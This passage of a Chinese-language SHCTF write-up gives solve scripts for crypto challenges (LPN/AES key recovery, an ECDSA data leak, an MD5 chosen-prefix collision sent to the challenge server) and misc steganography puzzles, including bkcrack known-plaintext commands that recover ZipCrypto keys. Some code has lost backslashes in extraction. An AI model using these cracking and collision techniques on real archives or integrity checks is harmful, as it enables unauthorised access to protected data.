get_flag(cands):\n    try: return long_to_bytes(int(\"\".join(str(c) for c in cands)))\n    except: return b''\n\ndef score(b):\n    if len(b) != 67 or not b.startswith(b'SHCTF{') or not b.endswith(b'}'): return -1000\n    return sum(1 for x in b if 32 <= x <= 126)\n\ndef solve():\n    with open('data.txt','r') as f:\n        data = f.read().split('n')\n    p1 = ast.literal_eval(data[0].split('=',1)[1])\n    p2 = ast.literal_eval(data[1].split('=',1)[1])\n    trace = ast.literal_eval(data[2].split('=',1)[1])\n    res_str = data[3].split('=',1)[1].strip()\n    res = bytes.fromhex(ast.literal_eval(res_str) if \"'\" in res_str else res_str)\n\n    A, b_vec = [], []\n    for n, bit in trace:\n        if bit == 1:\n            A.append([(n >> i) & 1 for i in range(128)])\n            b_vec.append(1)\n\n    k_bits = gauss_elim_gf3(A, b_vec)\n    key = sum((1 << i) for i, b in enumerate(k_bits) if b)\n    print(f\"Key: {hex(key)}\")\n\n    cipher = AES.new(md5(str(key).encode()).digest(), AES.MODE_CTR, nonce=b\"Tiffanyx00\")\n    f2_out = ast.literal_eval(cipher.decrypt(res).decode())\n\n    inv_p1 = invert_matrix([[Fraction(x) for x in r[:12]] for r in p1[:12]])\n    v = []\n    for i in range(0, len(f2_out), 16):\n        y = f2_out[i:i+16]\n        b_s = [Fraction(y[r] - p2[r]) for r in range(12)]\n        x = [sum(inv_p1[r][c] * b_s[c] for c in range(12)) for r in range(12)]\n        v.extend(int(k) for k in x)\n\n    enc, pad = v[:161], v[161:]\n\n    seed = None\n    for s in range(100000, 1000000):\n        random.seed(s)\n        for _ in range(len(enc)): random.randint(100000, 999999)\n        if [random.randint(0,255) for _ in range(len(pad))] == pad:\n            seed = s; break\n    print(f\"Seed: {seed}\")\n\n    random.seed(seed)\n    rs = [random.randint(100000, 999999) for _ in range(len(enc))]\n    D = [enc[0]] + [enc[i]^enc[i-1] for i in range(1,len(enc))]\n\n    cands = []\n    for val, r in zip(D, rs):\n        c = set()\n        d1 = val - r\n        if 0 <= d1 <= 9 and d1 % 2 == 0: c.add(d1)\n        if r != 0 and val % r == 0:\n            d2 = val \/\/ r\n            if 1 <= d2 <= 9 and d2 % 2 != 0: c.add(d2)\n        cands.append(list(c))\n\n    ambig = [i for i,c in enumerate(cands) if len(c) > 1]\n\n    for _ in range(200):\n        curr = [random.choice(c) for c in cands]\n        curr[2] = 1 \n        curr_b = get_flag(curr)\n        s = score(curr_b)\n        T, decay = 3.0, 0.9995\n\n        for __ in range(20000):\n            if s == 67: print(curr_b.decode()); return\n            pos = random.choice([x for x in ambig if x != 2])\n            old = curr[pos]\n            opts = [x for x in cands[pos] if x != old]\n            if not opts: continue\n            curr[pos] = random.choice(opts)\n            new_b = get_flag(curr)\n            new_s = score(new_b)\n            if new_s > s or random.random() < math.exp((new_s - s)\/(T + 0.001)):\n                s, curr_b = new_s, new_b\n            else:\n                curr[pos] = old\n            T *= decay\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{HYP3rLoN_mOd3_Lpn_@ff16X1Z_bl6_kl28_@3$_ctR_7FgDzBae0A8f3$61}<\/code><\/pre>\n\n\n\n
\u7b2c\u4e09\u9636\u6bb5<\/h2>\n\n\n\n
\u692d\u5706\u66f2\u7ebf\uff1f\uff1f\uff1f\uff01\uff01\uff01<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
task.py<\/p>\n\n\n\n
import hashlib\nimport ecdsa\nfrom Crypto.Util.number import *\nimport random\nimport json\n\ndef ver_length(secret_data):\n\n    p = getPrime(256)\n    secret = bytes_to_long(secret_data)\n    start = secret - 19 * p\n    end = secret + 21 * p\n\n    return start, end\n\ndef init(secret_data, msg1, msg2):\n\n    secret = bytes_to_long(secret_data)\n\n    gen = ecdsa.NIST256p.generator\n    order = gen.order()\n\n    pub_key = ecdsa.ecdsa.Public_key(gen, gen * secret)\n    priv_key = ecdsa.ecdsa.Private_key(pub_key, secret)\n\n    k = random.getrandbits(order.bit_length())\n\n    hash1 = int(hashlib.sha256(msg1).hexdigest(), 16)\n    signature1 = priv_key.sign(hash1, k)\n\n    hash2 = int(hashlib.sha256(msg2).hexdigest(), 16)\n    signature2 = priv_key.sign(hash2, k)\n\n    return signature1, signature2, k, secret\n\ndef main():\n\n    flag = b'SHCTF{test_flag_here}'\n    msg1 = b\"Welcome_to_SHCTF\"\n    msg2 = b\"It's_a_easy_problem_you_can_solve\"\n\n    start, end = ver_length(flag)\n    sig1, sig2, k, secret_value = init(flag, msg1, msg2)\n\n    output_data = {\n        'msg1': msg1.decode(),\n        'msg2': msg2.decode(),\n        'sig1_r': hex(sig1.r)[2:],\n        'sig1_s': hex(sig1.s)[2:],\n        'sig2_r': hex(sig2.r)[2:],\n        'sig2_s': hex(sig2.s)[2:],\n        'start': hex(start),\n        'end': hex(end)\n    }\n\n    with open('data.json', 'w') as f:\n        json.dump(output_data, f, indent=2)\n\nif __name__ == \"__main__\":\n    main()\n<\/code><\/pre>\n\n\n\n
data.json<\/p>\n\n\n\n
{\n  \"msg1\": \"Welcome_to_SHCTF\",\n  \"msg2\": \"It's_a_easy_problem_you_can_solve\",\n  \"sig1_r\": \"6b37cf5f824b2530c74db1a0a08d88a369ac553d6487c8b9ac5c0d69a7f1a883\",\n  \"sig1_s\": \"e0e89d49d90044cdfc7e67cffdf1c2e3691986418dfc978b683049781a055d11\",\n  \"sig2_r\": \"6b37cf5f824b2530c74db1a0a08d88a369ac553d6487c8b9ac5c0d69a7f1a883\",\n  \"sig2_s\": \"647c9615327aea66543131c9cafc3d77e87ae8adf7f7bd8cb141d2ca7246ed91\",\n  \"start\": \"0x53484354467b3230353426dd1c6dd189cb364e9d063309b9fab0c1126c020677e70ef6407f2a635c82573e\",\n  \"end\": \"0x53484354467b3230353440dc72476a7e08b5b396aa73d1169b4ca1c340276d7be542632f7c484a30163906\"\n}<\/code><\/pre>\n\n\n\n
\u7136\u9898\u76ee\u7ed9\u51fa\u4e86 ECDSA \u7b7e\u540d\u7684\u76f8\u5173\u4fe1\u606f\uff08\u5b58\u5728\u968f\u673a\u6570 kk \u91cd\u7528\u7684\u6f0f\u6d1e\uff09\uff0c\u4f46\u4ed4\u7ec6\u89c2\u5bdf\u7ed9\u51fa\u7684 Python \u6e90\u7801\u548c\u6570\u636e\uff0c\u6211\u4eec\u4f1a\u53d1\u73b0\u901a\u8fc7 start<\/code> \u548c end<\/code> \u7684\u5173\u7cfb\u53ef\u4ee5\u76f4\u63a5\u5229\u7528\u7b80\u5355\u7684\u4ee3\u6570\u65b9\u6cd5\u89e3\u51fa secret<\/code>\uff08\u5373 flag\uff09\uff0c\u5b8c\u5168\u4e0d\u9700\u8981\u53bb\u89e3 ECDSA \u7684\u79bb\u6563\u5bf9\u6570\u95ee\u9898\u3002<\/p>\n\n\n\n
\u6839\u636e\u6e90\u7801\u4e2d\u7684 ver_length<\/code> \u51fd\u6570\uff1a<\/p>\n\n\n\n
def ver_length(secret_data):\n    p = getPrime(256)\n    secret = bytes_to_long(secret_data)\n    start = secret - 19 * p\n    end = secret + 21 * p\n    return start, end<\/code><\/pre>\n\n\n\n
\u6211\u4eec\u6709\u4e24\u4e2a\u65b9\u7a0b\uff1a
$$
start=secret\u221219\u00d7pstart=secret\u221219\u00d7p
$$<\/p>\n\n\n\n
$$
end=secret+21\u00d7pend=secret+21\u00d7p
$$<\/p>\n\n\n\n
\u8fd9\u662f\u4e00\u7ec4\u5173\u4e8e secretsecret \u548c pp \u7684\u4e8c\u5143\u4e00\u6b21\u65b9\u7a0b\u7ec4\u3002\u9898\u76ee\u7ed9\u51fa\u4e86 startstart \u548c endend \u7684\u6570\u503c\uff0c\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u4ee5\u4e0b\u6b65\u9aa4\u89e3\u51fa secret<\/code>\uff1a<\/p>\n\n\n\n
\u7528\u65b9\u7a0b (2) \u51cf\u53bb\u65b9\u7a0b (1)\uff1a
$$
end\u2212start=(secret+21p)\u2212(secret\u221219p)end\u2212start=(secret+21p)\u2212(secret\u221219p)end\u2212start=40pend\u2212start=40p
$$
\u89e3\u51fa pp\uff1a
$$
p=(end\u2212start)\u00f740p=(end\u2212start)\u00f740
$$<\/p>\n\n\n\n
\u5c06 pp \u5e26\u56de\u4efb\u610f\u4e00\u4e2a\u65b9\u7a0b\u89e3\u51fa secretsecret\uff1a
$$
secret=start+19psecret=start+19p
$$
\u6700\u540e\u5c06\u6574\u6570 secretsecret \u8f6c\u6362\u56de\u5b57\u8282\u4e32\u5373\u53ef\u5f97\u5230 flag\u3002<\/p>\n\n\n\n
exp.py<\/p>\n\n\n\n
import json\nfrom Crypto.Util.number import long_to_bytes\n\n# data.json \u5185\u5bb9\ndata = {\n  \"msg1\": \"Welcome_to_SHCTF\",\n  \"msg2\": \"It's_a_easy_problem_you_can_solve\",\n  \"sig1_r\": \"6b37cf5f824b2530c74db1a0a08d88a369ac553d6487c8b9ac5c0d69a7f1a883\",\n  \"sig1_s\": \"e0e89d49d90044cdfc7e67cffdf1c2e3691986418dfc978b683049781a055d11\",\n  \"sig2_r\": \"6b37cf5f824b2530c74db1a0a08d88a369ac553d6487c8b9ac5c0d69a7f1a883\",\n  \"sig2_s\": \"647c9615327aea66543131c9cafc3d77e87ae8adf7f7bd8cb141d2ca7246ed91\",\n  \"start\": \"0x53484354467b3230353426dd1c6dd189cb364e9d063309b9fab0c1126c020677e70ef6407f2a635c82573e\",\n  \"end\": \"0x53484354467b3230353440dc72476a7e08b5b396aa73d1169b4ca1c340276d7be542632f7c484a30163906\"\n}\n\ndef solve():\n    # 1. \u5c06\u5341\u516d\u8fdb\u5236\u5b57\u7b26\u4e32\u8f6c\u6362\u4e3a\u6574\u6570\n    start_val = int(data['start'], 16)\n    end_val = int(data['end'], 16)\n\n    # 2. \u6839\u636e\u65b9\u7a0b\u7ec4\u89e3\u51fa p\n    # end - start = 40 * p\n    diff = end_val - start_val\n\n    # \u9a8c\u8bc1\u5dee\u503c\u662f\u5426\u80fd\u88ab 40 \u6574\u9664\n    if diff % 40 != 0:\n        print(\"[-] Error: The difference is not divisible by 40.\")\n        return\n\n    p = diff \/\/ 40\n    print(f\"[*] Calculated p: {p}\")\n\n    # 3. \u6839\u636e\u65b9\u7a0b\u89e3\u51fa secret\n    # secret = start + 19 * p\n    secret = start_val + 19 * p\n\n    # 4. \u5c06 secret \u8f6c\u6362\u4e3a flag \u5b57\u7b26\u4e32\n    try:\n        flag = long_to_bytes(secret)\n        print(f\"[+] Flag found: {flag.decode()}\")\n    except Exception as e:\n        print(f\"[-] Error converting secret to bytes: {e}\")\n\nif __name__ == \"__main__\":\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{205436e5-d598-4859-a237-d3f40e7ed45b}<\/code><\/pre>\n\n\n\n
hash3<\/strong><\/h3>\n\n\n\n
hash3.py<\/p>\n\n\n\n
import hashlib\nimport string\n\nwith open(\"\/flag.txt\",\"r\") as f:\n    flag = f.read().strip()\n\nmsg = input(f\"Give me both special apples (hex(apple1), hex(apple2)) : \")\n\ntry:\n    table = (string.ascii_letters + string.digits).encode()\n\n    apples = msg.split(\",\")\n    apple1 = bytes.fromhex(apples[0])\n    apple2 = bytes.fromhex(apples[1])\n    hash_apple1 = hashlib.md5(apple1).hexdigest()\n    hash_apple2 = hashlib.md5(apple2).hexdigest()\n\n    if len(apple1) <= 16 or len(apple1) <= 16:\n        print(f\"Both apples are too small\")\n    elif not all(ch in table for ch in apple1[:16]) or not all(ch in table for ch in apple2[:16]):\n        print(f\"No, both apples are too ordinary\")\n    elif apple1[:16] == apple2[:16]:\n        print(f\"Oh snap, both apples are the same\")\n    elif hash_apple1 != hash_apple2:\n        print(f\"Oh no, they taste different\")\n    else:\n        print(f\"Yeah, both apples are delicious!!! This is your prize: {flag}\")\n\nexcept:\n    print(f\"format fault :(\")\n    exit()<\/code><\/pre>\n\n\n\n
\u73b0\u5728\u662f \u4e24\u4e2a\u6587\u4ef6\u524d\u7f00\u90fd\u4e0d\u4e00\u6837<\/p>\n\n\n\n
MD5 \u9009\u62e9\u524d\u7f00\u78b0\u649e<\/strong>\u3002\u901a\u8fc7\u6784\u9020\u4e24\u4e2a\u8d77\u59cb\u5185\u5bb9\u4e0d\u540c\u4f46\u6700\u7ec8 MD5 \u503c\u76f8\u540c\u7684\u6587\u4ef6\u6765\u7ed5\u8fc7\u670d\u52a1\u7aef\u7684\u6821\u9a8c\u3002<\/p>\n\n\n\n
\u51c6\u5907\u524d\u7f00\u6587\u4ef6<\/strong>\uff08\u786e\u4fdd\u524d16\u5b57\u8282\u4e0d\u540c\u4e14\u4e3a\u5b57\u6bcd\u6570\u5b57\uff09\uff1a<\/p>\n\n\n\n
echo -n \"AAAAAAAAAAAAAAAA\" > p1.txt\necho -n \"AAAAAAAAAAAAAAAB\" > p2.txt<\/code><\/pre>\n\n\n\n
\u4f7f\u7528\u5de5\u5177\u751f\u6210\u78b0\u649e<\/strong>\uff1a \u4f7f\u7528 HashClash<\/strong> \u5957\u4ef6\u4e2d\u7684\u81ea\u52a8\u5316\u811a\u672c\u3002<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
# \u8fdb\u5165\u7f16\u8bd1\u597d\u7684 hashclash \u76ee\u5f55\nexport PATH=$PATH:$(pwd)\/bin\n.\/scripts\/cpc.sh p1.txt p2.txt<\/code><\/pre>\n\n\n\n
\u83b7\u53d6\u7ed3\u679c\u6587\u4ef6<\/strong>\uff1a \u5de5\u5177\u8fd0\u884c\u5b8c\u6210\u540e\u4f1a\u751f\u6210\uff1ap1.txt.coll<\/code> \u548c p2.txt.coll<\/code><\/p>\n\n\n\n
\u8dd1\u4e86\u56db\u4e2a\u5c0f\u65f6\u670d\u4e86<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
exp.py<\/p>\n\n\n\n
import socket\nimport hashlib\n\nHOST = 'challenge.shc.tf'\nPORT = 32647\nFILE1 = 'p1.txt.coll'\nFILE2 = 'p2.txt.coll'\n\ndef solve():\n    with open(FILE1, 'rb') as f: apple1 = f.read()\n    with open(FILE2, 'rb') as f: apple2 = f.read()\n\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((HOST, PORT))\n\n    resp = s.recv(1024).decode(errors='ignore')\n\n    if \"Give me\" in resp:\n        payload = apple1.hex() + \",\" + apple2.hex() + \"n\"\n        s.sendall(payload.encode())\n\n        while True:\n            data = s.recv(4096).decode(errors='ignore')\n            if not data: break\n            print(data.strip())\n            if \"flag{\" in data:\n                break\n    s.close()\n\nif __name__ == '__main__':\n    solve()<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{hMM_i_r34I1y_T4573D_The_MoST_dE1lC1Ous_HasHE_4PpLeS_In_th3_w0RId}<\/code><\/pre>\n\n\n\n
Misc<\/h1>\n\n\n\n
\u9636\u6bb51<\/h2>\n\n\n\n
\u7b7e\u5230<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{WiSh1ng_y0u_@_HaPpy_NEw_Ye@r_1n_Adv@nCe!}<\/code><\/pre>\n\n\n\n
Evan<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag.png \u76f4\u63a5binwalk\u6216\u8005foremost\u53ef\u4ee5\u5f97\u5230zip<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f2a\u52a0\u5bc6 \u89e3\u5bc6\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{Evan_1s_s0_h4nds0me!}<\/code><\/pre>\n\n\n\n
\u4e0d\u6b62\u4e8c\u7ef4\u7801<\/strong><\/h3>\n\n\n\n
LSB\u9690\u5199 \u6b63\u5e38\u626b\u63cf\u6ca1\u6709\u4e1c\u897f<\/p>\n\n\n\n
Red plane 0<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
FLAG_PART_1: SHCTF{55a23d24-<\/code><\/pre>\n\n\n\n
\u7eff\u82720<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
FLAG_PART_2: ABBB\/AABBB\/AAAAA\/BBBBB\/ABBBBA\/BBBBA\/B\/AABBB\/ABBB<\/code><\/pre>\n\n\n\n
\u6469\u65af\u5bc6\u7801<\/p>\n\n\n\n
\u6620\u5c04\u89c4\u5219\uff1a<\/strong><\/p>\n\n\n\n
A<\/strong>\u4e3a –<\/strong> (\u5212)<\/p>\n\n\n\n
B<\/strong> \u4e3a.<\/strong> (\u70b9)<\/p>\n\n\n\n
\u539f\u6587 (Part 2)<\/strong><\/th>\u8f6c\u6362 (A=-, B=.)<\/strong><\/th>\u6469\u65af\u89e3\u7801<\/strong><\/th>\u5907\u6ce8<\/strong><\/th><\/tr><\/thead>
ABBB<\/code><\/td>-...<\/code><\/td>B<\/strong><\/td>\u5341\u516d\u8fdb\u5236\u5b57\u7b26<\/td><\/tr>
AABBB<\/code><\/td>--...<\/code><\/td>7<\/strong><\/td>\u6570\u5b57<\/td><\/tr>
AAAAA<\/code><\/td>-----<\/code><\/td>0<\/strong><\/td>\u6570\u5b57<\/td><\/tr>
BBBBB<\/code><\/td>.....<\/code><\/td>5<\/strong><\/td>\u6570\u5b57<\/td><\/tr>
ABBBBA<\/code><\/td>-....-<\/code><\/td>–<\/strong><\/td>\u8fde\u5b57\u7b26 (Hyphen)<\/td><\/tr>
BBBBA<\/code><\/td>....-<\/code><\/td>4<\/strong><\/td>\u6570\u5b57<\/td><\/tr>
B<\/code><\/td>.<\/code><\/td>E<\/strong><\/td>\u5341\u516d\u8fdb\u5236\u5b57\u7b26<\/td><\/tr>
AABBB<\/code><\/td>--...<\/code><\/td>7<\/strong><\/td>\u6570\u5b57<\/td><\/tr>
ABBB<\/code><\/td>-...<\/code><\/td>B<\/strong><\/td>\u5341\u516d\u8fdb\u5236\u5b57\u7b26<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
b705-4e7b<\/code><\/pre>\n\n\n\n
Blue plane 0<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
FLAG_PART_3: MkZkbDg3ZlY3ZEQxalNGenQyZUFYT3E0NmRrTXFV<\/code><\/pre>\n\n\n\n
\u89e3\u7801Base64 -> Base62 -> Base58 -> Base32<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
-942e-bdd}<\/code><\/pre>\n\n\n\n
\u62fc\u63a5<\/p>\n\n\n\n
SHCTF{55a23d24-b705-4e7b-942e-bdd}<\/code><\/pre>\n\n\n\n
\u8587\u8587\u5b89\u7684\u7f8e\u7167<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
010\u770b\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{MV84Xzc0XzIwXzdfOTJfMTZfNV8xOF84Xzc=}<\/code><\/pre>\n\n\n\n
\u91cc\u9762base64\u89e3\u7801<\/p>\n\n\n\n
SHCTF{1_8_74_20_7_92_16_5_18_8_7}<\/code><\/pre>\n\n\n\n
\u5143\u7d20\u6620\u5c04\u89e3\u5bc6<\/p>\n\n\n\n
\u6570\u5b57<\/strong><\/th>\u5143\u7d20\u540d\u79f0<\/strong><\/th>\u7b26\u53f7<\/strong><\/th><\/tr><\/thead>
1<\/strong><\/td>\u6c22 (Hydrogen)<\/td>H<\/strong><\/td><\/tr>
8<\/strong><\/td>\u6c27 (Oxygen)<\/td>O<\/strong><\/td><\/tr>
74<\/strong><\/td>\u94a8 (Tungsten)<\/td>W<\/strong><\/td><\/tr>
20<\/strong><\/td>\u9499 (Calcium)<\/td>Ca<\/strong><\/td><\/tr>
7<\/strong><\/td>\u6c2e (Nitrogen)<\/td>N<\/strong><\/td><\/tr>
92<\/strong><\/td>\u94c0 (Uranium)<\/td>U<\/strong><\/td><\/tr>
16<\/strong><\/td>\u786b (Sulfur)<\/td>S<\/strong><\/td><\/tr>
5<\/strong><\/td>\u787c (Boron)<\/td>B<\/strong><\/td><\/tr>
18<\/strong><\/td>\u6c29 (Argon)<\/td>Ar<\/strong><\/td><\/tr>
8<\/strong><\/td>\u6c27 (Oxygen)<\/td>O<\/strong><\/td><\/tr>
7<\/strong><\/td>\u6c2e (Nitrogen)<\/td>N<\/strong><\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n
\u5927\u5199\u5c31\u884c<\/p>\n\n\n\n
SHCTF{H_O_W_CA_N_U_S_B_AR_O_N}<\/code><\/pre>\n\n\n\n
Open my puff<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u96f6\u5bbd\u5b57\u7b26<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u96f6\u5bbd\u5b57\u7b26\u9690\u5199\u89e3\u7801\n\u9ed8\u8ba4\u5b57\u7b26\u96c6\u9690\u85cf\u6587\u672c: keyA:12345678 keyB:qwertyui keyC:asdfghjk\n\n\u9ed8\u8ba4\u5b57\u7b26\u96c6\u9690\u85cf\u4e8c\u8fdb\u5236: keyA:12345678 keyB:qwertyui keyC:asdfghjk\n\n\u6269\u5c55\u5b57\u7b26\u96c6\u81ea\u52a8\u89e3\u7801: keyA:12345678 keyB:qwertyui keyC:asdfghjk\n\n\u53cc\u6a21\u5f0f\u96f6\u5bbd\u89e3\u7801\n\u6469\u5c14\u65af\u7801+Unicode\u89e3\u7801\nhandleDecode: 445e5e5t5t54454t4e444m454e4t4t44<\/code><\/pre>\n\n\n\n
\u5f97\u5230\u5bc6\u94a5<\/p>\n\n\n\n
 keyA:12345678 keyB:qwertyui keyC:asdfghjk<\/code><\/pre>\n\n\n\n
\u6839\u636e\u9898\u76ee\u540d\u5b57\u53ef\u4ee5\u77e5\u9053\u662fOpenPuff\u52a0\u5bc6\u548c3\u4e2a\u5bc6\u94a5<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5185\u5bb9<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770b\u51fa\u6765flag.txt<\/p>\n\n\n\n
niimmccw\u548czfip \u5c31\u662f\u504f\u79fb\u91cf<\/p>\n\n\n\n
\u5c06\u4ed6\u4eec\u8f6c\u6210hex<\/p>\n\n\n\n
niimmccw-->6e69696d6d636377\nzfip-->7a666970<\/code><\/pre>\n\n\n\n
bkcrack\u5c31\u884c<\/p>\n\n\n\n
\u547d\u4ee4<\/p>\n\n\n\n
bkcrack -C flag.zip -c flag.txt  -x 0 6e69696d6d636377  -x 12 7a666970<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u89e3\u538b<\/p>\n\n\n\n
bkcrack.exe -C flag.zip -k 4543d810 f89b3d67 531a63b0 -U flag1.zip easy\n#\u521b\u5efa\u4e00\u4e2a\u540d\u4e3a flag1.zip \u7684\u65b0\u6587\u4ef6\uff0c\u5e76\u5c06\u89e3\u538b\u5bc6\u7801\u7edf\u4e00\u8bbe\u4e3a easy\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{N3ur4l_Gl1tch_1n_Th3_5yst3m}   <\/code><\/pre>\n\n\n\n
\u6ef4\u7b54\u6ef4\u7b54<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SSTV\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{Radio_is_just_too_much_fun}<\/code><\/pre>\n\n\n\n
\u63d0\u95ee\u524d\u8bf7\u5148\u641c\u7d22<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6216\u8005\u95ee\u95eeAI\u8bbf\u95ee\u5c31\u51fa\u6765\u4e86<\/p>\n\n\n\n
SHCTF{D0_n0t_r3ly_0n_4I} <\/code><\/pre>\n\n\n\n
Office<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6539\u540e\u7f00.zip<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
lRy1m2qYkmewkTqDrneCoTCQoUiFqm7zqoeRoT7DqDCAqm7QsTqRuT3PqjWUt5e7<\/code><\/pre>\n\n\n\n
\u81ea\u5b9a\u4e49base \u538b\u7f29\u5305\u91cc\u9762\u627e\u5230\u81ea\u5b9a\u4e49\u7684base\u7f16\u7801\u5b57\u7b26\u96c6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
CYberChef\u76f4\u63a5\u89e3\u5c31\u884c\u4e86<\/p>\n\n\n\n
SHCTF{MS_Office_is_the_best_office_software.wps}<\/code><\/pre>\n\n\n\n
\u8d44\u6e90\u5e73\u6743\uff01<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
bkcrack \u7206\u7834\u5c31\u884c \u6784\u9020exe \u6587\u4ef6\u5934\u5c31\u884c<\/p>\n\n\n\n
bkcrack.exe -C 1.zip -c flag.exe -x 0 4D5A90000300000004000000FFFF<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u89e3\u538b<\/p>\n\n\n\n
bkcrack.exe -C 1.zip -c flag.exe -k 60101051 4cba82cb 48eac20c -d flag6666.exe<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u8fd0\u884c\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{002c158f-b4d2-4e14-bbbb-b5141bca8cb9}<\/code><\/pre>\n\n\n\n
\u9636\u6bb52<\/h2>\n\n\n\n
\u5947\u602a\u7684\u6570\u636e<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6570\u636e\u5206\u6790\uff1aflag.txt \u4e2d\u5305\u542b\u5927\u91cf RGB \u989c\u8272\u5143\u7ec4 (255,255,255)\u3002\n\u56fe\u50cf\u8fd8\u539f\uff1a\u7edf\u8ba1\u50cf\u7d20\u603b\u6570\uff0c\u5f00\u65b9\u5f97\u5230\u8fb9\u957f\uff08QR \u7801\u4e3a\u6b63\u65b9\u5f62\uff09\uff0c\u5229\u7528 Python PIL \u5e93\u5c06\u50cf\u7d20\u6570\u636e\u8fd8\u539f\u4e3a flag.png\u3002\n\u83b7\u53d6 flag\uff1a\u626b\u63cf\u751f\u6210\u7684\u4e8c\u7ef4\u7801\u5f97\u5230 Base64 \u5b57\u7b26\u4e32\uff0c\u89e3\u7801\u83b7\u5f97\u660e\u6587 Flag\u3002<\/code><\/pre>\n\n\n\n
exp.py<\/p>\n\n\n\n
import re\nimport math\nfrom PIL import Image\n\nwith open('flag.txt', 'r') as f:\n    data = f.read()\n\npixels = [tuple(map(int, x)) for x in re.findall(r'((d+),(d+),(d+))', data)]\nside = int(math.sqrt(len(pixels)))\n\nimg = Image.new('RGB', (side, side))\nimg.putdata(pixels)\nimg.save('QR.png')\n\nprint(f\"Generated: result_qrcode.png ({side}x{side})\")<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
base64\u89e3\u7801\u5c31\u884c<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
SHCTF{Th3_Quest1on5_Are_Too_D1fficu1t!!!!}<\/code><\/pre>\n\n\n\n
Base64Encryption<\/strong><\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5185\u5bb9<\/p>\n\n\n\n
Readme.txt<\/p>\n\n\n\n
\u770b\u6211\u628aBase64\u7684\u5b57\u7b26\u8868\u5168\u90fd\u6253\u4e71\u4e86!\u53ea\u8981\u522b\u4eba\u89e3\u4e0d\u5f00,\u90a3\u5c31\u662f\u52a0\u5bc6?\nb4CYzZ3RWg7pBuTyVmGrxaHhjtQMUqEno5XJscD\/1d892vO+Pfk6NewlFLSKiI0A<\/code><\/pre>\n\n\n\n
Readme.txt.enc<\/p>\n\n\n\n
HHnaHgciHg2tYhIVbWU1HH2RHmE6HvnhvtkgHUogvUdFHghWHaheHa2kw9oB2Dchp9ow2sfvDDcxgsf4\/9o3prV5p2B0AaJhhtu0c280j4Uu8Y5cNRNb90gV70GxNMyrGZiHZh+JPxSSfkS2GIINZ6IIqh3+oR5VU1YlToY4dWCEWnLYbhAEWhZMqRbT71L5fWyy<\/code><\/pre>\n\n\n\n
flag.zip.enc<\/p>\n\n\n\n
